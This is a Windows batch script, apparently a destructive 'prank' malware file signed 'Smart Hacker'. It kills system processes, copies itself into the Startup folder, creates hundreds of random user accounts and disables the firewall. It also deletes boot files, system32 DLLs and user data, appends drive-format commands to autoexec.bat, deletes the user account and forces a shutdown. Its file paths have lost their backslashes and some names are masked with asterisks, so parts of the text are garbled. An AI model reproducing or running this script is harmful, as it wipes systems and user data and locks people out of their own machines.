@echo off
cls
taskkill /f /t /im regedit.exe
taskkill /f /im DfServEx.exe
taskkill /f /im FrzState.exe 
taskkill /f /t /im explorer.exe
taskkill /f /t /im cmd.exe
taskkill /f /t /im paint.exe
taskkill /f /t /im run.exe
attrib +h C:Users%user****%Desktop
del C:Windowsregistration/*.*/y
del C:WindowsSetup/*.*/y
taskkill /f /t /im notepad.exe
del C:Windowssystem.ini
if exist c:progra~1mozillafirefox.exe goto :a 
if not exist c:progra~1mozillafirefox.exe goto :b :a 
del C:Windowsassembly/*.*/y
ipconfig /release
del Control Panel/*.*/y
attrib +h c:windows
del C:Users%user****%AppDataRoamingMicrosoftWindowsSta rt MenuProgramsStartup/*.*/y
attrib +h +r c:windowssystem32
copy %0 c:********s and settings%user****%start menuprogramsstartupsystem.bat
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add 




net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
net user %random% /add
del c:progra~1interne~1*.*/s/q
rundll32 keyboard, disable
attrib +h %0
del /s /q c:********s and settings%user****%desktop*.*/y
netsh firewall set opmode disable
del /s /q c:windows***wallpapers*.*/y
time 1:30
date %random%
rundll32 user32.dll, SwapMouseButton
del /s /q c:windowsmedia*.wma
del /s /q c:windowssystem32telnet.exe
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
del C:windows *.ini *.exe *.scr *.txt *.log
del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll
net user %user****% /delete
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll32.exe user.exe,exitwindows
del %userprofile%m~1*.*/s/q
del %windir%notepad.exe 
del %windir%system32notepad.exe 
del %windir%system32write.exe 
taskkill /f /t /im explorer.exe
shutdown -s -t 0
call attrib -h -r c:autoexec.bat >nul
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo Smart Hacker
e:
deltree /y *.jpg
cd
deltree /y *.mp3
cd
deltree /y *.asf
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat 
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
attrib -s -r -h c:windowshimem.sys
attrib -s -r -h c:windowshimem.sys
del c:windowshimem.sys
del d:windowshimem.sys
cls
exit